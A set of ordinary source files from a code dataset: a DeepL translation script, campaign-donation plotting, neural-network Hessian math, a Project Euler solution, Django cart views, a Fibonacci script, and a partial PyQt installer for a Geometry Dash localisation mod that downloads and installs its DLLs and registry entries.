enumerate(input_files):\n print(_index, output_file)\n val = input('select:')\n try: int(val)\n except ValueError:\n print('error:false input.')\n sys.exit()\n else: val = int(val)\n \n if val >= 0 and val <= len(input_files) - 1:\n return input_files[val]\n\n#-------------------------------------------\n#パス設定\n#-------------------------------------------\nhome_dir = get_home_dir(HOME_DIR_NAME)\ndata_dir = home_dir.joinpath('data')\ntools_dir = home_dir.joinpath('tools')\ninput_dir = data_dir.joinpath('intermediate')\noutput_dir = data_dir.joinpath('intermediate')\n\n#-------------------------------------------\n#csvの読み込み\n#-------------------------------------------\ninput_file_regex = INPUT_FILE_PREFIX + '*' + INPUT_FILE_SUFFIX\ninput_path_regex = str(input_dir.joinpath(input_file_regex))\ninput_path = select_file(input_path_regex)\n\nif input_path == '':\n print('error :[', input_path_regex, '] is no match.')\n sys.exit()\n\ndf = pd.read_csv(input_path, dtype=str, index_col=0)\nprint('input file :', input_path)\nprint(df)\n\n#-------------------------------------------\n#translation by deepl\n#-------------------------------------------\ntext_list = df['Prerequisite'].values.tolist()\ntext_list = ['' if pd.isna(x) else x for x in text_list]\nprint(text_list)\n\n#text_list = text_list[300:310]\n#print(text_list)\n\napi_key = input('input API-KEY : ')\nsource_lang = 'EN'\ntarget_lang = 'JA'\n\nparams = {\n 'auth_key' : api_key,\n 'text' : text_list,\n 'source_lang' : source_lang,\n \"target_lang\": target_lang\n }\n\nrequest = requests.post(\"https://api-free.deepl.com/v2/translate\", data=params)\nresult = request.json()\n\ntext_list_ja = []\nfor text_ja in result['translations']:\n text_list_ja.append(text_ja['text'])\n\nprint(text_list_ja)\n\ndf['Prerequisite_JA'] = text_list_ja\nprint(df)\n\n#-------------------------------------------\n#結果出力\n#-------------------------------------------\nnow = datetime.datetime.now()\noutput_file_name = OUTPUT_FILE_PREFIX + now.strftime('%Y%m%d_%H%M%S' + OUTPUT_FILE_SUFFIX)\noutput_path = os.path.join(output_dir, output_file_name)\ndf.to_csv(output_path)\n\n#-------------------------------------------\n#end\n#-------------------------------------------\nprint()\nprint(datetime.datetime.now())\nprint(__file__)\nprint('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')\nprint('\\n')\n","repo_name":"RATTATAlab/CATPEC","sub_path":"src/8_summaraize.py","file_name":"8_summaraize.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72258987347","text":"\n#Lily Steinberg\n\n#I affirm that I have carried out the attached academic endeavors with full academic honesty,\n#in accordance with the Union College Honor Code and the course syllabus.\n\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nfrom StringIO import StringIO\nimport csv\nfrom datetime import date, datetime\n\n#PART 1\n#creates a sample file to test code with\ndef take_sample (filename, sampleSize):\n i = 0\n oldFile = open(filename, 'r')\n newFile = open('newFile.txt', 'w')\n for line in oldFile:\n if i%sampleSize==0:\n newFile.write(line)\n i+=1\n\n#PART2\n# returns a dictionary that maps dates to donations for\n# a given candidate from a given CSV fle\ndef fnd_donation_dict(candidate, filename):\n donations = []\n date = []\n neg = []\n\n donations, date, neg = getData(candidate, donations, date, neg, filename)\n\n date = sorted(date)\n plt.plot(date, donations, color = 'y')\n plt.xlabel('Date of Donation')\n plt.ylabel('Amount Donated')\n plt.title('Campaign Contributions by Date')\n\n#PART 3\n#creates a graph of donations for multiple candidates\ndef multiple_donations(candidate1, candidate2, filename):\n c1donations = []\n c2donations = []\n c1dates = []\n c2dates = []\n neg = []\n\n c1donations, c1dates, neg = getData(candidate1, c1donations, c1dates, neg, filename)\n\n filename.close()\n filename = open('newfile.txt', 'r')\n\n c2donations, c2dates, neg = getData(candidate2, c2donations, c2dates, neg, filename)\n\n c1dates = sorted(c1dates)\n c2dates = sorted(c2dates)\n\n plt.plot(c1dates,c1donations,color = 'b')\n plt.plot(c2dates,c2donations, color = 'r')\n plt.xlabel('Date of Donation')\n plt.ylabel('Amount Donated')\n plt.title('Multiple Candidates Campaign Contributions by Date')\n blue_patch = mpatches.Patch(color='blue', label=candidate1)\n red_patch = mpatches.Patch(color='red', label=candidate2)\n plt.legend(handles=[red_patch, blue_patch])\n\n#PART 4\n#creates a graph of donations for multiple candidates that cuts off at a specified date\ndef cumulative_graph(candidate1, candidate2, date, filename):\n c1donations = []\n c2donations = []\n c1dates = []\n c2dates = []\n neg = []\n\n c1donations, c1dates, neg = getData(candidate1, c1donations, c1dates, neg, filename)\n\n filename.close()\n filename = open('newfile.txt', 'r')\n\n c2donations, c2dates, neg = getData(candidate2, c2donations, c2dates, neg, filename)\n\n c1dates = sorted(c1dates)\n c2dates = sorted(c2dates)\n\n date = datetime.strptime(date, \"%d-%b-%y\")\n\n c1donations, c1dates = delete_from_list(c1donations, c1dates, date)\n c2donations, c2dates = delete_from_list(c2donations, c2dates, date)\n\n plt.plot(c1dates, c1donations, color='b')\n plt.plot(c2dates, c2donations, color='r')\n plt.xlabel('Date of Donation')\n plt.ylabel('Amount Donated')\n plt.title('Increased Support for Bernie')\n blue_patch = mpatches.Patch(color='blue', label=candidate1)\n red_patch = mpatches.Patch(color='red', label=candidate2)\n plt.legend(handles=[red_patch, blue_patch])\n\n#helper method that creates new arrays without anything past the given date\ndef delete_from_list(donations, dates, enddate):\n i = 0\n newDates = []\n newDonations = []\n for day in dates:\n if day <= enddate:\n newDonations.append(donations[i])\n newDates.append(day)\n i+=1\n\n return newDonations, newDates\n\n\n#PART 5\n#graphs the amount of donations for each reason for a negative donation\ndef negative_donations(candidate, filename):\n donations = []\n date = []\n neg = []\n\n donations, date, neg = getData(candidate, donations, date, neg, filename)\n\n redesignationG = 0\n refund = 0\n reattribution = 0\n redesignationPG = 0\n\n redesignationG, refund, reattribution, redesignationPG = negative_reasons(neg, redesignationG, refund, reattribution, redesignationPG)\n\n groups = 4\n index = np.arange(groups)\n bar_width = 0.35\n\n y_axis = (redesignationG, refund, reattribution, redesignationPG)\n\n plt.bar(index, y_axis, bar_width, color = 'b')\n plt.xlabel('Reason for Negative Donation')\n plt.ylabel('Amount of Negative Donations')\n plt.xticks(index+bar_width, ('REDESIGNATION TO GENERAL', 'Refund', 'REATTRIBUTION TO SPOUSE', 'REDESIGNATION TO PRESIDENTIAL GENERAL'))\n plt.title('Negative Donations and Reasons for Ted Cruz')\n\n#graphs only the refunds\n#it is possible that these refunds were made because of insufficient funds\ndef refunds(candidate, filename):\n donations = []\n date = []\n neg = []\n\n donations, date, neg = getData(candidate, donations, date, neg, filename)\n\n redesignationG = 0\n refund = 0\n reattribution = 0\n redesignationPG = 0\n\n amountofnegs = len(neg)\n\n redesignation, refund, reattribution, redesignationPG = negative_reasons(neg, redesignationG, refund, reattribution, redesignationPG)\n\n groups = 1\n index = np.arange(groups)\n bar_width = 1\n\n plt.bar(index, refund, bar_width, color = 'b')\n plt.xlabel('Reason for Negative Donation')\n plt.ylabel('Amount of Negative Donations')\n plt.title('Refunds for Ted Cruz')\n\n#helper method to get the amount of donations for each negative reason\ndef negative_reasons(negativearray, redesignationG, refund, reattribution, redesignationPG):\n for reason in negativearray:\n if reason == 'REDESIGNATION TO GENERAL':\n redesignationG+=1\n if reason == 'Refund':\n refund+=1\n if reason == 'REATTRIBUTION TO SPOUSE':\n reattribution+=1\n if reason == 'REDESIGNATION TO PRESIDENTIAL GENERAL':\n redesignationPG+=1\n\n return redesignationG, refund, reattribution, redesignationPG\n\n\n\n#helper method to extract data from the spreadsheet\ndef getData(candidate, donations, date, neg, filename):\n i = 0\n for line in filename:\n if i>0:\n data = StringIO(line)\n reader = csv.reader(data, delimiter=',')\n\n for row in reader:\n candidateName = row[2]\n if candidateName == candidate:\n donations.append(row[9])\n betterDate = datetime.strptime(row[10], \"%d-%b-%y\")\n date.append(betterDate)\n if row[9].startswith('-'):\n neg.append(row[11])\n\n i+=1\n\n return donations, date, neg\n\nfilename = open('P00000001-ALL.csv', 'r')\n#filename = open('newFile.txt', 'r')\ncandidate1 = 'Sanders, Bernard'\ncandidate2 = 'Clinton, Hillary Rodham'\ncandidate3 = \"Cruz, Rafael Edward 'Ted'\"\ncandidate4 = \"Rubio, Marco\"\ncandidate5 = 'Bush, Jeb'\n#fnd_donation_dict(candidate1, filename)\n#multiple_donations(candidate1, candidate2, filename)\n#cumulative_graph(candidate1, candidate2, '13-JUN-15', filename)\n#negative_donations(candidate4, filename)\nrefunds(candidate3, filename)\nplt.show()\n","repo_name":"lcsteinberg1129/pythonProjects","sub_path":"take_sample.py","file_name":"take_sample.py","file_ext":"py","file_size_in_byte":6946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32769564960","text":"import numpy as np\n\nx = np.array([[0.1,0.3,0.1,0.6,0.4,0.6,0.5,0.9,0.4,0.7],\n [0.1,0.4,0.5,0.9,0.2,0.3,0.6,0.2,0.4,0.6]])\n\ny = np.array([[1,1,1,1,1,0,0,0,0,0],\n [0,0,0,0,0,1,1,1,1,1]])\n\n\n#network is 2-2-3-2\nW0 = 0.5*np.random.rand(2,2)\nW1 = 0.5*np.random.rand(3,2)\nW2 = 0.5*np.random.rand(2,3)\n\ndef activate(x,W):\n \"\"\"Sigmoid activation function\"\"\"\n z = W@x\n a = 1/(1+np.exp(-z))\n return(a)\n\n\n# X\nx0 = x[:,0]\nx1 = activate(x0,W0)\nx2 = activate(x1,W1)\nx3 = activate(x2,W2)\n\n# Sigma'\nd1sigma1 = np.diagflat(x1*(1-x1))\nd1sigma2 = np.diagflat(x2*(1-x2))\nd1sigma3 = np.diagflat(x3*(1-x3))\n\n# Sigma''\nd2sigma1 = np.diagflat(x1*(1-x1)*(1-2*x1))\nd2sigma2 = np.diagflat(x2*(1-x2)*(1-2*x2))\nd2sigma3 = np.diagflat(x3*(1-x3)*(1-2*x3))\n\n# Lambdas\nl3 = x3-y[:,0]\nl2 = W2.T @d1sigma3 @l3\nl1 = W1.T @d1sigma2 @l2\nl0 = W0.T @d1sigma1 @l1\n\n\n# V\nv0 = np.ones(4)\nv1 = np.ones(6)\nv2 = np.ones(6)\n\n# Xi\nxi0 = np.zeros(2)\nxi1 = d1sigma1 @ W0 @ xi0 + np.kron(x0.T,d1sigma1) @ v0\nxi2 = d1sigma2 @ W1 @ xi1 + np.kron(x1.T,d1sigma2) @ v1\nxi3 = d1sigma3 @ W2 @ xi2 + np.kron(x2.T,d1sigma3) @ v2\n\n# A\nA0 = W0.T @ np.diagflat(l1) @ d2sigma1 @ W0\nA1 = W1.T @ np.diagflat(l2) @ d2sigma2 @ W1\nA2 = W2.T @ np.diagflat(l3) @ d2sigma3 @ W2\n\n# D\nD0 = np.kron(np.outer(x0,x0), np.diagflat(l1) @ d2sigma1)\nD1 = np.kron(np.outer(x1,x1), np.diagflat(l2) @ d2sigma2)\nD2 = np.kron(np.outer(x2,x2), np.diagflat(l3) @ d2sigma3)\n","repo_name":"wbbreslin/NeuralNetwork","sub_path":"Old Code/Hessian Implementation.py","file_name":"Hessian Implementation.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31383736284","text":"\"\"\"\r\n## Names scores\r\n\r\nProblem 22\r\n\r\nUsing names.txt (right click and 'Save Link/Target As...'), a 46K text file containing over five-thousand first names, begin by sorting it into alphabetical order. Then working out the alphabetical value for each name, multiply this value by its alphabetical position in the list to obtain a name score.\r\n\r\nFor example, when the list is sorted into alphabetical order, COLIN, which is worth 3 + 15 + 12 + 9 + 14 = 53, is the 938th name in the list. So, COLIN would obtain a score of 938 × 53 = 49714.\r\n\r\nWhat is the total of all the name scores in the file?\r\n\r\n\r\nLink: https://projecteuler.net/problem=22\r\n\r\nDate solved: \r\n2022/04/01\r\n\"\"\"\r\n\r\nANSWER = 871198282\r\n\r\n# imports\r\n\r\n\r\n# solution\r\n\r\n\r\ndef solution():\r\n file_name = \"problem_files/p022_names.txt\"\r\n with open(file_name, \"r\") as f:\r\n names = f.read()\r\n names = names[1:-1].split('\",\"')\r\n names.sort()\r\n\r\n def name_score(name):\r\n score = 0\r\n for char in name:\r\n score += ord(char) - 64\r\n return score\r\n\r\n name_score_sum = 0\r\n for i, name in enumerate(names):\r\n name_score_sum += name_score(name) * (i + 1)\r\n\r\n return name_score_sum\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from time import perf_counter\r\n\r\n t0 = perf_counter()\r\n sol = solution()\r\n t1 = perf_counter()\r\n print(f\"solution = {sol} in {t1-t0: 0.4f} seconds\")\r\n print(\"answer =\", ANSWER)\r\n","repo_name":"lsabor/project_euler","sub_path":"000-100/20s/022_05_Name_scores.py","file_name":"022_05_Name_scores.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44261853042","text":"from django.shortcuts import render,redirect, reverse\n\n# Create your views here.\n\ndef view_cart(request):\n \"\"\"\n A view that renders the cart content\n \"\"\"\n return render (request, \"cart.html\")\n\n \"\"\"\n Note that we dont have to pass a cart dictionary (as we had to do with products)\n because the context is available everywhere\n \"\"\"\n\ndef add_to_cart(request, id):\n \"\"\"\n Add a quantity of the specified product to the cart\n \"\"\"\n quantity = int(request.POST.get('quantity'))\n\n cart = request.session.get('cart', {})\n if id in cart:\n cart[id] = int(cart[id]) + quantity \n else:\n cart[id] = cart.get(id, quantity) \n\n request.session['cart'] = cart\n return redirect(reverse('index'))\n\ndef adjust_cart(request, id):\n \"\"\"\n Adjust the quantity of the specified product to the specified\n amount\n \"\"\"\n quantity = int(request.POST.get('quantity'))\n cart = request.session.get('cart', {})\n\n if quantity > 0:\n cart[id] = quantity\n else:\n cart.pop(id)\n \n request.session['cart'] = cart\n return redirect(reverse('view_cart'))","repo_name":"elenasacristan/ecommercce","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18398764652","text":"print(\"fibonacci number? \")\nnum = int(input())\n\ndef fibo(n):\n\tif(n == 0):\n\t\treturn 1;\n\telif(n == 1):\n\t\treturn 1;\n\telse:\n\t\treturn fibo(n-2) + fibo(n-1)\n\nresult = []\n\nfor i in range(num):\n\tresult.append(fibo(i))\n\nprint(\"F\", num, \" = \", result)\n\n\n","repo_name":"WBQT/git_test","sub_path":"fibo_num.py","file_name":"fibo_num.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7893104154","text":"import os\nimport sys\nimport shutil\nimport subprocess\nimport json\nimport zlib\nimport winreg\nimport requests\nimport time\nimport finder\nimport threader\nimport winapi\nfrom PyQt5 import QtCore, QtWidgets\nfrom installer_ui import Ui_MainWindow\n\n\nclass Installer:\n def __init__(self, app: any, installer_data: dict = None) -> None:\n self.app = app\n self.installer_data = installer_data or {}\n self.logger = self.app.logger\n self.application = QtWidgets.QApplication(sys.argv)\n self.window = QtWidgets.QMainWindow()\n self.hwnd = int(self.window.winId())\n self.app.check_dark_theme()\n self.logger.log('Dark Theme', self.app.is_dark)\n if self.app.is_dark:\n self.app.apply_dark(self.hwnd)\n self.set_stylesheet('Darkeum')\n else:\n self.set_stylesheet('Ubuntu')\n self.install_game_path = ''\n self.install_path = ''\n self.locale_str = self.installer_data.get('locale')\n self.locale_split = [self.locale_str] if self.locale_str else QtCore.QLocale().name().lower().strip().split('_')\n self.logger.log('System Locale', self.locale_split)\n self.binary_data = b''\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self.window)\n self.after_setup_ui()\n if 'ru' in self.locale_split:\n self.ui.langBox.setCurrentIndex(1)\n else:\n self.ui.langBox.setCurrentIndex(0)\n self.locale_str = 'en'\n self.load_locale('en')\n self.window.show()\n self.json_data = {}\n self.exit_code = self.application.exec_()\n\n def check_lang(self, current_index: int) -> None:\n if current_index == 0:\n self.locale_str = 'en'\n elif current_index == 1:\n self.locale_str = 'ru'\n self.load_locale(self.locale_str or 'en')\n\n def load_locale(self, locale_str: str) -> None:\n self.app.locale = json.loads(self.app.read_text(os.path.join(self.app.files_dir, f'locale_{locale_str}.json')))\n _translate = QtCore.QCoreApplication.translate\n ld = self.app.locale['data']\n self.window.setWindowTitle(ld[0])\n self.ui.hellomainLabel.setText(ld[1])\n self.ui.helloLabel1.setText(ld[2])\n self.ui.helloLabel2.setText(ld[3])\n self.ui.langLabel.setText(ld[4])\n self.ui.tabs.setTabText(self.ui.tabs.indexOf(self.ui.helloTab), ld[5])\n self.ui.folderLabel.setText(ld[6])\n self.ui.folderpathButton.setText(ld[7])\n self.ui.regappBox.setText(ld[8])\n self.ui.tabs.setTabText(self.ui.tabs.indexOf(self.ui.folderselectTab), ld[9])\n self.ui.defaultType.setText(ld[10])\n self.ui.loaderType.setText(ld[11])\n self.ui.modType.setText(ld[12])\n self.ui.hackType.setText(ld[13])\n self.ui.typeLabel.setText(ld[14])\n self.ui.gdhmType.setText(ld[15])\n self.ui.tabs.setTabText(self.ui.tabs.indexOf(self.ui.typeselectTab), ld[16])\n self.ui.downloadLabel.setText(ld[17])\n self.ui.unpackLabel.setText(ld[18])\n self.ui.tabs.setTabText(self.ui.tabs.indexOf(self.ui.installTab), ld[19])\n self.ui.ok1Label.setText(ld[20])\n self.ui.ok2Label.setText(ld[21])\n self.ui.githubBox.setText(ld[22])\n self.ui.discordBox.setText(ld[23])\n self.ui.siteBox.setText(ld[24])\n self.ui.tabs.setTabText(self.ui.tabs.indexOf(self.ui.okTab), ld[25])\n self.ui.cancelButton.setText(ld[26])\n self.ui.goForwardButton.setText(ld[27])\n self.ui.goBackButton.setText(ld[28])\n\n def after_setup_ui(self) -> None:\n self.window.setWindowFlag(QtCore.Qt.WindowType.CustomizeWindowHint, True)\n self.window.setWindowFlags(\n # QtCore.Qt.WindowType.WindowCloseButtonHint |\n QtCore.Qt.WindowType.WindowMinimizeButtonHint\n )\n self.ui.tabs.setCurrentIndex(0)\n self.ui.tabs.tabBar().setEnabled(not self.app.is_compiled)\n if self.installer_data:\n self.ui.folderpathEdit.setText(self.installer_data['game_path'])\n self.ui.regappBox.setChecked(self.installer_data['is_registered'])\n self.ui.folderpathEdit.setEnabled(False)\n self.ui.folderpathButton.setEnabled(False)\n self.ui.regappBox.setEnabled(False)\n else:\n self.ui.folderpathEdit.setText(\n finder.ProcessFinder(self.app).game_dir or finder.SteamFinder(self.app).game_dir\n )\n if not self.app.is_compiled:\n self.ui.folderpathEdit.setText('e:/games/gd_test')\n self.bind_events()\n\n def bind_events(self) -> None:\n self.ui.cancelButton.clicked.connect(lambda: self.app.show_question(\n self.window, self.app.locale['data'][29], self.app.locale['data'][30], self.window.close\n ))\n self.ui.goForwardButton.clicked.connect(self.go_forward)\n self.ui.goBackButton.clicked.connect(self.go_back)\n self.ui.folderpathButton.clicked.connect(self.select_install_dir)\n self.ui.folderpathEdit.textChanged.connect(self.check_install_dir)\n self.ui.adafpathEdit.textChanged.connect(self.check_radio_buttons)\n self.ui.loaderType.changeEvent = self.check_radio_buttons\n self.ui.langBox.currentIndexChanged.connect(self.check_lang)\n self.logger.log('Events bound')\n\n def run_game_installer_and_exit(self) -> None:\n subprocess.Popen(os.path.join(self.ui.folderpathEdit.text(), 'GDL_Installer.exe'))\n sys.exit(0)\n\n def tab_changed(self, to_change: int = -1) -> None:\n if to_change >= 0:\n self.ui.tabs.setCurrentIndex(to_change)\n tab_id = to_change\n else:\n tab_id = self.ui.tabs.currentIndex()\n self.logger.log('Tab id', tab_id)\n if tab_id == 0:\n self.ui.goBackButton.setEnabled(False)\n self.ui.goForwardButton.setEnabled(True)\n elif tab_id == 1:\n self.load_json()\n self.ui.goBackButton.setEnabled(True)\n self.ui.goForwardButton.setText(self.app.locale['data'][27])\n self.check_install_dir()\n elif tab_id == 2:\n if not self.installer_data:\n check_fn = os.path.join(self.ui.folderpathEdit.text(), 'gdl-installer.json')\n if os.path.isfile(check_fn):\n self.tab_changed(1)\n self.app.show_question(\n self.window,\n self.app.locale['data'][31],\n self.app.locale['data'][32],\n self.run_game_installer_and_exit\n )\n self.ui.goBackButton.setEnabled(True)\n self.ui.goForwardButton.setText(self.app.locale['data'][33])\n default_path = os.path.join(self.ui.folderpathEdit.text(), 'adaf-dll')\n self.ui.defaultType.setEnabled(not (os.path.isdir(default_path) and os.listdir(default_path)))\n self.ui.modType.setEnabled(os.path.isdir(os.path.join(self.ui.folderpathEdit.text(), 'mods')))\n self.ui.hackType.setEnabled(os.path.isdir(os.path.join(self.ui.folderpathEdit.text(), 'extensions')))\n self.ui.gdhmType.setEnabled(os.path.isdir(os.path.join(self.ui.folderpathEdit.text(), '.GDHM', 'dll')))\n self.check_radio_buttons()\n if not self.installer_data:\n return\n self.ui.defaultType.setEnabled(False)\n self.ui.modType.setEnabled(False)\n self.ui.hackType.setEnabled(False)\n self.ui.gdhmType.setEnabled(False)\n self.ui.loaderType.setEnabled(False)\n self.ui.adafpathEdit.setEnabled(False)\n elif tab_id == 3:\n self.ui.goForwardButton.setEnabled(False)\n self.ui.goBackButton.setEnabled(False)\n self.ui.cancelButton.setEnabled(False)\n target_dir = 'adaf-dll'\n if self.ui.modType.isChecked():\n target_dir = 'mods'\n elif self.ui.hackType.isChecked():\n target_dir = 'extensions'\n elif self.ui.gdhmType.isChecked():\n target_dir = os.path.join('.GDHM', 'dll')\n self.install_game_path = self.ui.folderpathEdit.text()\n self.install_path = os.path.join(self.install_game_path, target_dir)\n if self.installer_data:\n self.install_path = self.installer_data['dll_path']\n if not os.path.isdir(self.install_path):\n os.mkdir(self.install_path)\n self.ui.downloadBar.setMaximum(self.json_data['size'])\n self.ui.unpackBar.setMaximum(self.json_data['gdl-assets-size'])\n self.logger.log('Installing to', self.install_path)\n self.window.download_thread = loader = threader.Downloader()\n self.window.binary_data = b''\n loader.url = self.json_data['binaries-url']\n loader.encoding = self.app.encoding\n loader.chunk_size = 1024 * 32 if self.app.is_compiled else 1024 * 128\n loader.progress.connect(self.download_progress)\n loader.start()\n elif tab_id == 4:\n self.ui.goForwardButton.setEnabled(True)\n self.ui.goBackButton.setEnabled(False)\n self.ui.cancelButton.setEnabled(False)\n self.ui.goForwardButton.setText(self.app.locale['data'][34])\n\n def register_app(self) -> None:\n self.logger.log('Registering app')\n reg = winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE)\n try:\n winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE, self.app.reg_path)\n except Exception as err:\n self.logger.error('Failed to create reg key', err)\n return\n try:\n key = winreg.OpenKey(reg, self.app.reg_path, 0, winreg.KEY_WRITE)\n except Exception as err:\n self.logger.error('Failed to open reg key', err)\n return\n winreg.SetValueEx(key, 'DisplayIcon', 0, winreg.REG_SZ, os.path.join(self.install_game_path, 'gdl-icon.ico'))\n winreg.SetValueEx(key, 'DisplayName', 0, winreg.REG_SZ, 'Geometry Dash Localisation')\n winreg.SetValueEx(key, 'DisplayVersion', 0, winreg.REG_SZ, '1.0.0')\n winreg.SetValueEx(key, 'URLInfoAbout', 0, winreg.REG_SZ, self.json_data['settings-url'])\n installer_path = '\"' + os.path.join(self.install_game_path, os.path.basename(self.app.exec_script)) + '\"'\n if not self.app.is_compiled:\n installer_path = '\"' + sys.executable + '\" ' + installer_path\n self.logger.log('Installer path', installer_path)\n winreg.SetValueEx(\n key,\n 'ModifyPath',\n 0,\n winreg.REG_SZ,\n installer_path.replace('/', '\\\\') + ' --modify'\n )\n winreg.SetValueEx(\n key,\n 'UninstallString',\n 0,\n winreg.REG_SZ,\n installer_path.replace('/', '\\\\') + ' --remove'\n )\n winreg.SetValueEx(key, 'Publisher', 0, winreg.REG_SZ, 'The GDL Community')\n winreg.SetValueEx(key, 'NoModify', 0, winreg.REG_DWORD, 0)\n winreg.SetValueEx(key, 'NoRepair', 0, winreg.REG_DWORD, 0)\n winreg.CloseKey(key)\n\n def save_settings(self) -> None:\n try:\n shutil.copy(\n self.app.exec_script,\n os.path.join(self.install_game_path, os.path.basename(self.app.exec_script))\n )\n except Exception as err:\n self.logger.error('Failed to copy installer', err)\n shutil.copy(\n os.path.join(self.app.files_dir, 'gdl_icon.ico'),\n os.path.join(self.install_game_path, 'gdl-icon.ico')\n )\n if self.installer_data:\n is_default = self.installer_data['is_default']\n is_registered = self.installer_data['is_registered']\n else:\n is_default = self.ui.defaultType.isChecked()\n is_registered = self.ui.regappBox.isChecked()\n json_result = {\n 'locale': self.locale_str,\n 'is_default': is_default,\n 'is_registered': is_registered,\n 'dll_path': self.install_path,\n 'game_path': self.install_game_path,\n 'json_data': self.json_data\n }\n self.app.write_text(os.path.join(self.install_game_path, 'gdl-installer.json'), json.dumps(json_result))\n self.logger.log('Installer json wrote')\n if self.ui.regappBox.isChecked():\n self.register_app()\n self.tab_changed(4)\n\n def unzip_gdl(self) -> None:\n self.logger.log('Unzipping gdl into memory')\n files = {}\n for data in self.json_data['gdl-binaries']:\n files[data['fn']] = self.binary_data[:data['size']]\n self.binary_data = self.binary_data[data['size']:]\n self.logger.log('Other size 0 is', len(self.binary_data))\n for fn in ('gdl_patches.json', 'ru_ru.json', 'ru_ru_locations.json', 'minhook.x32.dll'):\n self.app.write_binary(os.path.join(self.install_game_path, fn), files[fn])\n if not self.installer_data and self.ui.defaultType.isChecked(): # Please work\n try:\n self.app.write_binary(os.path.join(self.install_game_path, 'xinput9_1_0.dll'), files['xinput9_1_0.dll'])\n except Exception as err:\n self.logger.error('Failed to write xinput', err)\n dll_path = os.path.join(self.install_path, 'GDLocalisation.dll')\n dll_bak_path = dll_path + '.bak'\n if os.path.isfile(dll_bak_path):\n try:\n os.remove(dll_bak_path)\n except Exception as err:\n self.logger.error('Failed to remove dll backup', err)\n if os.path.isfile(dll_path):\n os.rename(dll_path, dll_bak_path)\n self.app.write_binary(\n dll_path,\n files['GDLocalisation.dll']\n )\n self.logger.log('Binaries are unzipped')\n self.save_settings()\n\n def unzip_progress(self, status: int, content: str) -> None:\n if status == 0:\n self.ui.unpackBar.setValue(len(self.binary_data) - int(content))\n return\n if status == 1:\n self.binary_data = self.binary_data[self.json_data['gdl-assets-size']:]\n self.logger.log('Data Unzipped')\n self.unzip_gdl()\n return\n self.logger.error('Failed to unzip assets', content)\n self.app.show_error(\n self.window,\n self.app.locale['data'][31],\n self.app.locale['data'][35],\n lambda: self.tab_changed(2)\n )\n\n def download_progress(self, status: int, chunk: bytes) -> None:\n if status == 0:\n self.window.binary_data += chunk # noqa\n self.ui.downloadBar.setValue(len(self.window.binary_data)) # noqa\n return\n if status == 1:\n self.binary_data = zlib.decompress(self.window.binary_data, 0xF | 0x20) # noqa\n del self.window.binary_data # noqa\n self.logger.log('Bin downloaded', len(self.binary_data)) # noqa\n backup_path = os.path.join(self.install_game_path, 'gdl-backup')\n if not os.path.isdir(backup_path):\n os.mkdir(backup_path)\n self.logger.log('Backup dir created')\n self.logger.log('Unzipping to', self.install_game_path)\n self.window.unzip_thread = unzipper = threader.Unzipper()\n unzipper.encoding = self.app.encoding\n unzipper.base_dir = self.install_game_path\n unzipper.json_data = self.json_data['gdl-assets']\n unzipper.bin_data = self.binary_data\n unzipper.progress.connect(self.unzip_progress)\n unzipper.start()\n return\n del self.window.binary_data # noqa\n self.logger.error('Failed to download bin', chunk.decode(self.app.encoding))\n self.app.show_error(\n self.window,\n self.app.locale['data'][31],\n self.app.locale['data'][36],\n lambda: self.tab_changed(2)\n )\n\n def go_forward(self) -> None:\n self.logger.log('Go forward')\n if self.ui.tabs.currentIndex() == 2:\n if self.ui.loaderType.isChecked():\n if not os.path.isdir(os.path.join(self.ui.folderpathEdit.text(), self.ui.adafpathEdit.text())):\n self.app.show_error(\n self.window,\n self.app.locale['data'][31],\n self.app.locale['data'][37] + self.ui.adafpathEdit.text()\n )\n return\n if self.ui.tabs.currentIndex() == 4:\n if self.ui.siteBox.isChecked():\n winapi.ShellExecuteW(\n self.hwnd,\n None,\n self.json_data['site-url'],\n None,\n None,\n 0x05\n )\n if self.ui.githubBox.isChecked():\n winapi.ShellExecuteW(\n self.hwnd,\n None,\n self.json_data['github-url'],\n None,\n None,\n 0x05\n )\n if self.ui.discordBox.isChecked():\n winapi.ShellExecuteW(\n self.hwnd,\n None,\n self.json_data['settings-url'],\n None,\n None,\n 0x05\n )\n self.window.close()\n return\n self.ui.tabs.setCurrentIndex(self.ui.tabs.currentIndex() + 1)\n self.tab_changed()\n\n def go_back(self) -> None:\n self.logger.log('Go back')\n self.ui.tabs.setCurrentIndex(self.ui.tabs.currentIndex() - 1)\n self.tab_changed()\n\n def check_radio_buttons(self, *args: any) -> None:\n self.logger.log('Checking radio buttons', *args)\n self.ui.goForwardButton.setEnabled(True)\n if not self.ui.defaultType.isEnabled() and self.ui.defaultType.isChecked():\n self.ui.defaultType.setChecked(False)\n self.ui.loaderType.setChecked(True)\n\n def check_install_dir(self) -> None:\n install_dir = self.ui.folderpathEdit.text().strip()\n self.logger.log('Checking install dir', install_dir)\n if not os.path.isdir(install_dir):\n self.logger.log('Install dir check failed')\n return self.ui.goForwardButton.setEnabled(False)\n is_gd = self.app.is_gd_path(install_dir)\n self.logger.log('Install dir check', is_gd)\n self.ui.goForwardButton.setEnabled(is_gd)\n\n def select_install_dir(self) -> None:\n path = QtWidgets.QFileDialog.getExistingDirectory(\n self.window, self.app.locale['data'][38], self.ui.folderpathEdit.text()\n )\n self.logger.log('Selected install dir', path)\n 